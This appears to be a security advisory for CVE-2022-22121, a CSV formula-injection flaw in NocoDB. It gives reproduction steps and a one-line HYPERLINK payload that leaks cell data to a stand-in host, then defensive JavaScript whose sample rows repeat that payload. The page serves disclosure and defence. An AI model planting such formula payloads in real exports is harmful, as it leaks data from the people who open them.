
CVE-2022-22121

Date: January 10, 2022

Overview

In NocoDB, versions 0.81.0 through 0.83.8 are affected by a CSV Injection (Formula Injection) vulnerability. A low-privileged attacker can create a new table and inject payloads into the table rows. When an administrator accesses the User Management endpoint, exports the data as a CSV file and opens it, the payload gets executed.

Details

NocoDB's download-as-CSV functionality fails to sanitize user-controlled input before writing it to the downloaded CSV file, which leads to a formula injection vulnerability.

PoC Details

Sign in to the NocoDB application and create a new table using a lower-privileged user such as editor. Create a new row in this table with its value set to the formula injection payload shown below. Then click download as CSV, which triggers the formula injection vulnerability.

PoC Code

=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")

Affected Environments

0.81.0 through 0.83.8

Prevention

Update to version 0.84.0 or later
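
For exporters that cannot be upgraded immediately, or for reviewing similar CSV download code, the following is an added example of neutralizing formula cells at export time. It is not NocoDB's own fix; the function names and the sample rows are assumptions made for illustration.

```javascript
// Added example (not NocoDB code): neutralize spreadsheet formulas on CSV export.
// All function names here are hypothetical.

// Leading characters that make a spreadsheet evaluate a cell as a formula
// (per OWASP CSV injection guidance): = + - @, plus tab and carriage return.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

function neutraliseFormula(value) {
  const text = value === null || value === undefined ? '' : String(value);
  // Values stored as real numbers (e.g. -12.5) are data, not formulas.
  if (typeof value === 'number') return text;
  if (text.length > 0 && FORMULA_TRIGGERS.has(text[0])) {
    return "'" + text; // leading apostrophe forces the cell to plain text
  }
  return text;
}

function toCsvField(value) {
  const text = neutraliseFormula(value);
  // RFC 4180 quoting: wrap fields containing a comma, quote or newline and
  // double any embedded quotes, so a payload cannot break out into a new cell.
  if (/[",\r\n]/.test(text)) {
    return '"' + text.replace(/"/g, '""') + '"';
  }
  return text;
}

function toCsv(rows) {
  return rows.map((row) => row.map(toCsvField).join(',')).join('\r\n');
}

// Constructed sample rows; the second row carries the payload from this page.
const sampleRows = [
  ['Title', 'Note'],
  ['row1', '=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")'],
  ['row2', -12.5],
  ['row3', '@SUM(A1:A2)'],
];
console.log(toCsv(sampleRows));
```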

Language: VUE

Good to know:


Injection

CWE-74

Improper Neutralization of Formula Elements in a CSV File

CWE-1236

Upgrade Version

Upgrade to version nocodb - 0.84.0


Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial